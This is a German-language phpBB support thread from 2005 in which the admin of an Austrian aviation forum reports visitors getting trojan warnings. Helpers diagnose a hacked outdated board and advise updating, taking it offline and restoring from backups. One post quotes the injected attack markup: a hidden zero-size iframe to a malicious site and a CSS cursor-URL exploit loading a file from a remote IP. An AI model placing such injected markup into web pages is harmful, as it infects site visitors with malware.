Trojaner / Riesenproblem

patrick_wien · Beitrag von **patrick_wien** » 12.11.2005 17:41

Liebe Community!

Ich betreue als Admin das Luftfahrtforum Österreich, welches unter www.flughafen-aspern.at/forum im Netz aufrufbar ist.

Wir haben derzeit 17.000 Beiträge. Die letzte Datensicherung habe ich bei ungefähr 12.000 Beiträgen gemacht, wobei ich immer die Option "Vollständiges Backup" verwendet habe.

Seit 2 Tagen habe ich offenbar ein Virenproblem und weiß nicht woher.

Mehrere PM's bzw. mit Mails erreichten mich deswegen. Die letzte möchte ich hier wiedergeben:

Wenn man das Board ausfruft - kommen zwei Trojaner:

Die mein McAfee sofort findet und löscht:

der eine das was ich vorher geschrieben habe und eine
zweit Datei: jar_cache18637.tmp

Ich verwende die Boardversion 2.0.10.

Ich bin ein relativer Laie, da das Board als kleines Privatforum gedacht war und sich wider Erwarten zu dem entwickelt hat, was es heute ist.

Ich ersuche daher um die geschätzte Hilfe der Community, wie ich am besten vorgehen soll/kann, auch um die Beiträge zu erhalten!

Besten Dank vorab und Gruß von einem leicht verzweifelten Webmaster aus Österreich!

Patrick

patrick_wien · Beitrag von **patrick_wien** » 12.11.2005 17:50

und gerade erhielt ich noch diese pm deswegen:

Eventuell hat sich bei Euch was eingeschlichen

z.b.:
<iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

dort findet sich dann das Exloit:

<style>
* {CURSOR: url("http://213.159.117.203/dl/adv514/sploit[1].anr")}
</style>
<script>
....

irgendso in der Art.

tost · Beitrag von **tost** » 12.11.2005 18:00

In einem iframe startet jemand schadehaften Code:
http://www.phpbb.de/doku/kb/artikel.php ... ht=cracker

Wichtig:
Board offline nehmen und updaten..

Wenn du es selbst nicht kannst gibt es viele hier im Forum (eingeschlossen mir) die es gerne machen

tost

patrick_wien · Beitrag von **patrick_wien** » 12.11.2005 18:02

Lieber Tost!

Ich kann es selbst tatsächlich nicht und werde dir heute am Abend (jetzt bin ich noch im Büro) eine PM schicken ...

Vielen DANK schon mal vorab, diese Community hier ist super!

Saint · Beitrag von **Saint** » 12.11.2005 18:03

Der Trojaner wird über einen IFrame verlinkt.
Wenn ich mich recht erinnere findest Du den Aufruf des Trojaners als html tag im Feld für die Forenbeschreibung:
ACP --> Allgemeines --> Konfiguration --> "Beschreibung der Seite"

Dort kannst Du das entfernen. Ob das dauerhaft ist kann ich Dir aber nicht sagen.
Auf jeden Fall solltest Du sofort ein Update auf die 2.0.18 machen und diese KB Artikel beachten:

KB:gehackt
KB:sicher

Viel Erfolg!

Gruß

Saint

smart · Beitrag von **smart** » 12.11.2005 18:04

Mensch, das ist grob fahrlässig! Unbdingt Board updaten und gucken, was der Bösewicht da alles kaputt gemacht hat. Und zukünftig REGELMÄßIGE Backups machen! Ich gehe jetzt mal nicht davon aus, aber wenn du Pech hast, und mehr verloren geht, dann hast du mit dem alten Update mal eben 5.000 Beiträge verloren - die möchten Andere erst einmal haben!

Also: Toi toi toi!

tost · Beitrag von **tost** » 12.11.2005 18:10

Er hat diesen Session-Id Exploit benutzt und dann im ACP irgendwo auch den Trojaner eingeschleust:

Wichtig ist zunächst nimm das Board offline und sichere es mit einer .htaccess vor Zugriff jeglicher Art ab..

tost

patrick_wien · Beitrag von **patrick_wien** » 12.11.2005 18:15

Vielen Dank für die raschen Antworten. Ich sitze derzeit im Büro und habe keinen Zugriff auf meinen Server. Habe das Board einmal gesperrt und nehme es zu Hause dann vollständig offline ...